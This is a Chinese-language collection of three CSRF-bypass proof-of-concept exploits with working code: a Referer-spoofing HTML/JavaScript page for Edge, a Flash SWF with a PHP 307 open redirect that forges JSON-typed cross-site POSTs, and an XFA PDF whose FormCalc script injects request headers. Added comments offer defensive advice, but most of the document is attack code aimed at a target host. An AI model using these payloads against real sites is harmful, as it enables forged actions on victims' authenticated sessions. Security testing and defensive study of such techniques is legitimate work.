#1. Bypass只验证Referrer的CSRF防御

//Edge only
//Ref:https://www.cracking.com.ar/demos/referer/02/

<!-- Demo page for the technique above (Edge only, per the note). Two text inputs
     feed spoofMe(): the URL that should show up as the Referer, and the site that
     is meant to receive it.
     Defender note: the Referer header is client-controlled here, so a CSRF check
     that only compares Referer is insufficient; pair it with a per-session token
     and SameSite cookies. -->
<h2>Edge Referrer Spoof II</h2>
Referrer to Spoof: <input id="spoofed_referer" value="https://www.microsoft.com/" type="text" size="50"/>
<br /><br />
Fooled WebSite: <input id="fooled_website" value="https://www.whatismyreferer.com" type="text" size="50"/>
<br /><br />
<input type="button" value="Spoof Me" onclick="spoofMe()" />
<script>
// Opens redir.php (not included on this page) in a new window with the chosen
// referrer URL, inserts an iframe into that window, points the iframe's opener
// back at the window, and from inside the iframe schedules a navigation of the
// opener to the "fooled" site. The inputs are read through their ids as globals
// (spoofed_referer, fooled_website), so the page must keep those ids.
// The actual Referer outcome depends on the Edge behaviour demonstrated at the
// reference link above; this code only sets up that sequence.
function spoofMe()
{
    // redir.php receives the spoofed URL as ?URL=; what it does with it is not shown here.
    var win = window.open("redir.php?URL=" + spoofed_referer.value);
    var ifr = win.document.createElement("iframe");
    win.document.appendChild(ifr);
    // win[0] is the iframe's window; its opener is pointed at the parent window
    // so the timer callback below can reach it as `opener`.
    win[0].opener = win;
    // The timer body is a string evaluated inside the iframe: it shows a blocking
    // alert (see the message text) and then navigates the opener to the target.
    win[0].setTimeout("alert('Thread blocker. \\nClose me once the site starts loading behind.\\nThen we will automatically redirect with the forged referrer');opener.location='"+fooled_website.value +"'");
}
</script>

#2. Bypass只验证Content-Type请求头的CSRF防御

//受害者浏览器需要安装flash&开启flash
//Ref:https://github.com/sp1d3r/swf_json_csrf/
//source.as

package 
{
    import flash.display.Loader;
    import flash.display.LoaderInfo;
    import flash.display.Sprite;
    import flash.net.URLLoader;
    import flash.net.URLRequest;
    import flash.net.URLRequestHeader;
    import flash.net.URLRequestMethod;

    // Document class of the SWF. When loaded it reads jsonData, php_url, endpoint
    // and (optionally) ct from loaderInfo.parameters and sends one POST to
    // php_url?endpoint=... with the chosen Content-Type. redirect.php (below)
    // answers with a 307, so the client repeats the POST at `endpoint`.
    // NOTE(review): whether the player also re-sends the custom Content-Type on
    // the 307 hop is not shown on this page; the referenced repository is the
    // source of that claim.
    // Defender note: accepting a request solely because its Content-Type is
    // application/json is not a CSRF defence; require a token or an Origin
    // check and set SameSite on session cookies.
    public class re extends Sprite 
    {

        public function re() 
        {
            // All inputs come from the SWF's URL query string / FlashVars.
            var myJson: String = this.root.loaderInfo.parameters.jsonData;
            var url: String = this.root.loaderInfo.parameters.php_url;
            var endpoint: String = this.root.loaderInfo.parameters.endpoint;
            // Content-Type defaults to application/json when ct is absent or falsy.
            var ct: String = (this.root.loaderInfo.parameters.ct)?this.root.loaderInfo.parameters.ct:"application/json";
            var request: URLRequest = new URLRequest(url + "?endpoint=" + endpoint);
            request.requestHeaders.push(new URLRequestHeader("Content-Type", ct));
            request.data = myJson;
            request.method = URLRequestMethod.POST;
            // No event listeners are attached: the response is never read.
            var urlLoader: URLLoader = new URLLoader();
            try 
            {
                urlLoader.load(request);
                return;
            }
            catch(e: Error) 
            {
                // Errors are only traced, never surfaced to the caller.
                trace(e);
                return;
            }
        }
    }
}

//redirect.php

<?php
// Relay used by the SWF above: replies to every request with a 307 pointing at
// whatever URL arrived in ?endpoint=. A 307 instructs the client to repeat the
// same method and body at the new location, which is what carries the POST on.
// NOTE(review): this is an unvalidated (open) redirect by construction; it is
// only meaningful on the tester's own host and must never be deployed on an
// origin that users trust.
header("Location: ".$_GET["endpoint"], true, 307);
?>

//请求示例
//https://yourhost.com/test.swf?jsonData={"test":1}&php_url=https://yourhost.com/test.php&endpoint=https://targethost.com/endpoint

#3. Bypass只验证自定义HTTP头的CSRF防御

//受害者需要使用IE且IE安装有Acrobat Reader
//ref:http://insert-script.blogspot.jp/2015/05/pdf-mess-with-web.html

//test.pdf

% a PDF file using an XFA
% most whitespace can be removed (truncated to 570 bytes or so...)
% Ange Albertini BSD Licence 2012
% a little bit modified to show possible header injection via formcalc

%PDF-1. % can be truncated to %PDF-\0


% Object 1 is the XFA (XDP) packet; the trailer below references it via /XFA 1 0 R.
% The form has a single field whose initialize event runs a FormCalc script.
1 0 obj <<>>
stream
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config><present><pdf>
    <interactive>1</interactive>
</pdf></present></config>

<template>
    <subform name="_">
        <pageSet/>
        <field id="Hello World!">
            <event activity="initialize">
                <!-- FormCalc Post(url, data, contentType, encoding, headers). The last
                     argument appears to be placed into the request headers verbatim
                     (hence the "header injection" note at the top); here it carries a
                     header the server would not expect from a browser request.
                     Defender note: the presence of a custom header alone does not prove
                     the request came from same-origin script; combine it with a CSRF
                     token and SameSite cookies. -->
                <script contentType='application/x-formcalc'>
                    Post("http://sameOrigin.com/redirect.php","YOUR POST DATA","text/plain","utf-8","Content-Type: DolphinTest: AAA")
                </script>
            </event>
        </field>
    </subform>
</template>
</xdp:xdp>
endstream
endobj

% Minimal trailer with no xref section (see the size note at the top): one
% AcroForm with a single button widget, plus the /XFA reference to object 1.
trailer <<
    /Root <<
        /AcroForm <<
            /Fields [<<
                /T (0)
                /Kids [<<
                    /Subtype /Widget
                    /Rect []
                    /T ()
                    /FT /Btn
                >>]
            >>]
            /XFA 1 0 R
        >>
        /Pages <<>>
    >>
>>

//redirect.php

<?php
// Target of the FormCalc Post() above, hosted on the same origin as test.pdf.
// It answers with a 307 to a fixed location, so the client repeats the POST
// (same method and body; presumably the injected header too, per the reference
// post) at example.com.
header("Location: http://example.com", true, 307);
?>

//请求示例
//http://sameOrigin.com/test.pdf

Happy bug hunting!
